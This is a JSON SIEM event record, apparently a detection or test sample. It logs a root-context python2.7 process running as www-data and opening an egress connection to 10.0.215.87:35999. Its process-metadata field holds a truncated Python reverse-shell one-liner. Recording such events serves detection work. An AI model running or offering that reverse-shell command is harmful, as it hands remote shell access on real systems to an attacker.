{
  "subject": "process",
  "action": "open",
  "object": "connection",
  "status": "success",
  "category.generic": "Connection",
  "category.high": "Network Interaction Management",
  "category.low": "Communication",
  "chain_id": "36860",
  "datafield1": "python",
  "direction": "egress",
  "dst.ip": "10.0.215.87",
  "dst.port": 35999,
  "event_src.category": "Operating system",
  "event_src.ip": "127.0.0.1",
  "event_src.rule": "pt_siem_api_connect",
  "event_src.subsys": "auditd",
  "event_src.title": "unix_like",
  "id": "PT_UNIX_like_auditd_syslog_structured_syscall_sockets",
  "importance": "low",
  "logon_service": "pts/11",
  "msgid": "connect",
  "object.account.group": "www-data",
  "object.account.id": "33",
  "object.account.name": "www-data",
  "object.property": "socket_domain",
  "object.value": "AF_INET",
  "src.ip": "127.0.0.1",
  "subject.account.id": "0",
  "subject.account.name": "root",
  "subject.account.privileges": "33",
  "subject.account.session_id": "36",
  "subject.process.fullpath": "/usr/bin/python2.7",
  "subject.process.id": "26133",
  "subject.process.meta": "python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.215.87\",35999));os.dup",
  "subject.process.name": "python2.7",
  "subject.process.parent.id": "25790",
  "subject.process.path": "/usr/bin/",
  "time": "2019-07-25T14:39:29.000Z"
}